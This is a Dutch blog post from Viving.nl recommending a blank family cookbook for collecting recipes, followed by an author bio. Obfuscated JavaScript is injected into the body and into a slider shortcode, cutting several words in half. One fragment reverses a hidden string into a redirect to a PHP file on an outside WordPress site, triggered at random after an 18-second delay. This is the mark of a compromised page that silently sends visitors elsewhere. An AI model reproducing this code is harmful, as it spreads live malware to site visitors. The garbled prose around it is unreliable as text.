My family cookbook

Ken je dat? Echt overal liggen kooktijdschriften, kookboeken en losse recepten. Ik was ooit begonnen om losse recepten in een map te doen, maar eigenlijk kijk ik nog maar zelden in deze mappen. En de echt lekkere recepten die voor herhaling vatbaar zijn, kan ik nooit terug vinden.

My family cookbook is een kookboek waarin je je favoriete recepten kunt bewaren. Het kookboek is helemaal leeg en bevat standaard recept templates om je recepten op te schrijven. Daarnaast heeft het allemaal extra pagina’s met onder ander een inhoudsopgave, fodom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s, reviews van familieleden, etc.

Persoonlijk heb ik dit kookboek al een aantal keren cadeau gegeven. Op de eerste pagina kun je dan alvast een receptje schrijven voor degene aan wie je het kookboek geeft.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”3″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”yes” img_size=”300×300″]

“In mijn persoonlijke my family cookbook staan heel veel recepten die ik gekregen heb van familie en vrienden. Ik vind het ook altijd erg leuk om terug te lezen hoe ik ook al weer aan een recept kom.”

my family cookbook 7

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "My family cookbook"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.